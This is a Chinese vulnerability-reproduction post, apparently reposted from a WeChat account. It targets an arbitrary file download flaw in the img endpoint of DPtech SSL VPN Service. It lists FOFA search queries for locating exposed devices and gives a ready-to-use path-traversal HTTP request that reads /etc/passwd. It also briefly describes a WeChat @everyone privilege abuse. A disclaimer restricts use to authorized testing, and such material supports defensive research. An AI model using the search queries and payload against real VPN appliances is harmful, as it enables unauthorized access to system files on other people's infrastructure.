![[漏洞复现] DPtech SSL VPN Service img 接口存在任意文件下载漏洞 | vx越权@所有人](http://cn-sec.com/wp-content/uploads/2023/11/7-1700056676.png "[漏洞复现] DPtech SSL VPN Service img 接口存在任意文件下载漏洞 | vx越权@所有人")
![[漏洞复现] DPtech SSL VPN Service img 接口存在任意文件下载漏洞 | vx越权@所有人](http://cn-sec.com/wp-content/uploads/2023/11/8-1700056677.png "[漏洞复现] DPtech SSL VPN Service img 接口存在任意文件下载漏洞 | vx越权@所有人")
app="DPtech-SSLVPN"
body="SSL VPN" && (banner="Dptech" || header="Dptech")
![[漏洞复现] DPtech SSL VPN Service img 接口存在任意文件下载漏洞 | vx越权@所有人](http://cn-sec.com/wp-content/uploads/2023/11/2-1700056678.png "[漏洞复现] DPtech SSL VPN Service img 接口存在任意文件下载漏洞 | vx越权@所有人")
![[漏洞复现] DPtech SSL VPN Service img 接口存在任意文件下载漏洞 | vx越权@所有人](http://cn-sec.com/wp-content/uploads/2023/11/1-1700056678.png "[漏洞复现] DPtech SSL VPN Service img 接口存在任意文件下载漏洞 | vx越权@所有人")
GET/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2FpasswdHTTP/1.1Host:Connection: keep-alivePragma: no-cacheCache-Control: no-cachesec-ch-ua: "Google Chrome";v="117", "Chromium";v="117", "Not=A?Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9
今天的vx越权@所有人不知道大家玩的怎么样,今天被@烂了,只要在有权限的群里@所有人,复制后到其他群里就可以实现,听说还可以踢掉群主
注:本文中提到的漏洞验证 poc 或工具仅用于授权测试,任何未经授权的测试均属于非法行为。任何人不得利用本文中的技术手段或工具进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
原文始发于微信公众号(扫地僧的茶饭日常):[漏洞复现] DPtech SSL VPN Service img 接口存在任意文件下载漏洞 | vx越权@所有人
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论